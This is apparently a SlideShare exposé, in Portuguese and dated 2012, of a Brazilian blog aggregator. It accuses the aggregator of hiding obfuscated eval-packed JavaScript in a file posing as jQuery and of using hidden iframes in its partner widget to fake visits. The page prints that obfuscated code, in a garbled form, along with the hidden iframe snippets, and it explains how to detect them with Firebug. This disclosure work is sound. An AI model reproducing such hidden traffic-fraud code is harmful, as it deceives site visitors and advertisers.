UAZAAA - Farsa Parte IIDepois da nossa primeira denúncia, o pessoal deste agregador tirou o código criptografado que ficav...
Com este caracteres estranhos não entendemos nada, não é mesmo ? Desta forma, quando visualizamos o códigofonte da página,...
Achamos os IFRAMES.... ☺Explicando o método:Uma das exigências de parceria do Uazaa é a utilização do widget em todos os b...
O <iframe style="display:none;" src="http://www.uazaa.xpg.com.br/">Gera um acesso para a home do uazaa...Por exemplo: Se v...
Próximos SlideShares
Carregando em…5
×

Uazaa uma-farsa-parte 2

2.069 visualizações

Publicada em

Publicada em: Tecnologia
0 comentários
0 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
2.069
No SlideShare
0
A partir de incorporações
0
Número de incorporações
6
Ações
Compartilhamentos
0
Downloads
3
Comentários
0
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Uazaa uma-farsa-parte 2

  1. 1. UAZAAA - Farsa Parte IIDepois da nossa primeira denúncia, o pessoal deste agregador tirou o código criptografado que ficava no arquivojquery-1.6.2.min.js (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js)Quem não viu dá uma olhada em http://www.slideshare.net/devninjabr/uazaa-uma-farsa que explico a técnica.Hoje dei uma olhada novamente e vi que ele continua utilizando a fraude.Desta vez ele utilizou uma forma de criptografia que envolve a função EVAL do javascript e juntamente com umacriptografia em hexadecimal.O código se encontra ao final do arquivo (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js) que comodisse na Parte I, é um arquivo acima de qualquer suspeita, por se tratar de um arquivo encontrado em quase todosos blogs...Apenas para curiosidade, o código encontrado ao final do arquivo é este:eval(function (p, a, c, k, e, d){ e = function (c) { return (c < a ? : e(c / a)) + String.fromCharCode(c % a + 161); }; if (!.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return [xa1-xff]+; }; c = 1; }; while (c--) { if (k[c]) { p = p.replace(new RegExp(e(c), g), k[c]); } } return p}(¢¦ ¶=["£à ¤£¿¤°«®«§«µ«¨«Â¥à ¨¹£¿¤§¥à £³¤§¢§®Ã-©©ó¨¤£Ö¤§Ø®¥¥¥É¤¤§¹§¢®¥¢¤£ÓãÂ-Ç£ð¤§ÉªÈ¥ó§Ç£ß¤£Ê¥¥Ã¸£Û¤ï©©Ç£°¤ØñØ«£Â-¥¥à £»¤§à à ¥Â¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹Â£¿¤¨¥à £³ÔÂ-¨ÀÃÀ¸¨¹£¿¤¥à £³©¦¦Êɩø§¹£Ã¸£»¤§à à ¥£Û¤µÂ§À¥°¹°Ç£°¤£âԣ䤩¦¦½©É¨¤§¥É©¦¦½©«©Ä©¥«µÂ§À¥¸£³Ô°Ã¤©é¤Ó¤°«®«§«µ«¨«Â¥à ¨¹Ó¤§¥à ÖÔ§Ç줮¥Ã¸Õ¤ï¦©¦©ÇܤØñث륥à Ú¤§à à ¥Â-¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹ÂÓ¤¨¥à ÖÔ¨ÀÃÀ¸¨¹Ó¤¥à Ö¦©¦¦¦¦Êɦ©Ã¸§¹£Ã¸Ú¤§à à ¥Õ¤µÂ§À¥°¹°ÇܤèÔ夦©¦¦¦¦½¦©É¨¤§¥É¦©¦¦¦¦½¦©«¦©Ä¦©¥«µÂ§À¥¸Ö԰䦩äÇߤ⤦¦¦©¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢»¢®¢®¢ª¢Ñ¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢¨¢Å¢£¢Â-¢±¢¬¢¯¢³¢Ì¢Ê¢¨¢¯¢¯¢£¢ª¢»¢ª¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢Å¢¾¢¿¢ð¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢»¢®¢®¢ª¢Ñ¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢¨¢Å¢£¢Â-¢±¢¬¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢Å¢¾¢¿¦¦¦©¥¥¸¦©«à «à «¦©ê¡ò¡ø¡ü¡ô¡ÿ¡ç¡á¡þ¡¢¡¡ý¡ú¡ö¡õ¡÷¡£²¡££¡£ª¡£±¡£¾¡£¼¡£¬¡£¯¡£Å¡£È¡£®¡£½¡£§¡£Ì¡£¨¡£Î¡£Ä¡£Ñ¡£º¡£Ù¡£µ¦©Ç£Æ¤¦©¡¦©¥«²«à Ã¥¥©«£·«£à «©¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡£¿¡£³¡£Ê¡£°¡£Û¡£»¡£Â-¡£â¡£ä¡£à ¡£ß¡£Ü¡£Õ¡£Ú¡£ë¡£è¡ª¯¡£å¡£é¡£ì¡£ê¡£ò¡£ø¡£ü¡£ô¡£ÿ¡£ç¡£á¡£þ¡£¢¡¡£ý¡£ú¡ª²¡£ö¡£õ¡£÷¡ª£¡ªª¡£·¡ª±¡ª¾¡ª¼¡ª¬¡ªÅ¡ª®¡ª½¡ª§¡£Ò©Ç£Ò¤©¡©¥«²«à Ã¥¥","¡","à °Æº·","¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ÎÒ³§·º»³¡Â¨·Ò³¡ÊѺƨ¡Â-¨°Æ®§¨¡ºÎ¡á·Âº³Ä¡¨ß®Æ¡¬ª¡à °Æº·¡·»á·Â-º³Ä¡±¬¡³¨Ê¡ç¨ÄÕⰡλ¿à Ñ®Âà »Ì¨¡±¼¡°®Â-à ¨å³·¡Å¾¡¬£¡ªÕ¡¯²¡¯ª¡¬¼¡ªÚ¡¬¬¡¬Ü¡¯±¡¯¾¡¬È¡¯¯¡¬±¡¬Ú¡±à ¡±Ü¡±Ó¡¬Õ¡¬à ¡¯È¡±Õ¡¯¼¡¬Å¡¡¬¯¡¯Å¡¯Ó¡¬¾¡±Ö¡Êº·¨¡¡¬Ö¡¡Ò³¨à §®°¨¡Ì»§Ò¿¨³·¡²Ó","","ÃŽÂ-»¿à Ñ®Âà »Ì¨","¨°Æ®§¨","¦ÊÉ","¦½","Ä"];¢¢(Þ(à ,ã,´,×,Ë,æ){Ë=Þ(´){à (´<ã?¶[4]:Ë(¢£(´/ã)))+((´=´%ã)>¢¥?ù[¶[5]](´+¢®):´.¢Â(¢«))};î(!¶[4][¶[6]](/^/,ù)){û(´--){æ[Ë(´)]=×[´]||Ë(´)};×=[Þ(Ë){à æ[Ë]}];Ë=Þ(){à ¶[7]};´=1};û(´--){î(×[´]){à =à [¶[6]](¢ª ¢©(¶[8]+Ë(´)+¶[8],¶[9]),×[´])}};à à }(¶[0],¢¨,¢¬,¶[3][¶[2]](¶[1]),0,{}));,95, 109, x7C|x25|x31|x28|x29|x5C|x63|x65|x27|x32|x2C|x36|x72|x61|x37|x70|x33|x30|x6E|_0x1c28x3|x6B|_0x3d99|x74|x3B|x3D|x69|x6F|x35|x62|x34|x6D|x5D|x7B|x5B|x7D|x67|x38|x6C|x2E|x39|x2B|x77|_0x1c28x5|x64|x43|x66|x2D|x73|x68|x75|x41|x20|x45|x42|_0x1c28x4|x2F|x6A|x46|x71|x44|return|function|x76|_0x1c28x1|x53|x78|_0x1c28x2|x79|x49|_0x1c28x6|x52|x48|x4A|x4C|x47|x4B|x3F|if|x21|x7A|x5E|x4D|x3A|x50|x59|x58|x5A|x4E|String|x57|while|x4F|x56|x54|x51|x55|eval|parseInt|x3E|35|var|x3C|62|RegExp|new|36|137|toString|29.split(|),0, {}))
  2. 2. Com este caracteres estranhos não entendemos nada, não é mesmo ? Desta forma, quando visualizamos o códigofonte da página, ninguém consegue entender o que este código faz.Bom amigo blogueiro, agora vou explicar para vocês, uma forma para verificar se algum site está utilizando deartimanhas para mandar visitas.Existe um plugin do Firefox que se chama Firebug (http://firebug.softonic.com.br/download)Ele é uma ferramenta que ajuda os programadores na hora de desenvolver sites. Uma das inúmeras funcionalidadesdele é mostrar como seria o código fonte, independente se o cara criptografou...Vamos agora ao exemplo, usando o nosso Agregador Favorito.Vamos direto ao arquivo do trambique: o dos Widgets... http://www.uazaa.xpg.com.br/widgets/250x250.phpAtivamos o Firebug e...Aparece o código fonte já descriptografado...Tcham tcham tcham tcham!!!!
  3. 3. Achamos os IFRAMES.... ☺Explicando o método:Uma das exigências de parceria do Uazaa é a utilização do widget em todos os blogs parceiros. Desta forma, quandoalguém acessa o seu blog, TODO acesso gera um acesso à página inicial do uazaa e também um acesso falso paraalgum blogueiro (geralmente os que ficam no topo durante o dia).O <iframe style="display:none;" src="http://www.uazaa.xpg.com.br/fuckoff.php">gera um link aleatório para que o uazaa mande visitas para algum blogueiro. (Experimente acessarhttp://www.uazaa.xpg.com.br/fuckoff.php que toda vez é um site diferente)PS: Logo após a denúncia, ele alterou o nome do script para:http://www.uazaa.com.br/newRed.php (atualização feita em 14/01/2012)
  4. 4. O <iframe style="display:none;" src="http://www.uazaa.xpg.com.br/">Gera um acesso para a home do uazaa...Por exemplo: Se vc tiver 50 online no seu blog, o widget será carregado 50 vezes... e automaticamente serácontado + 50 acessos na home do uazaa... E de quebra o uazaa manda visitas falsas para 50 blogs.Tá dado o recado...13/01/2012@devninjaBR

×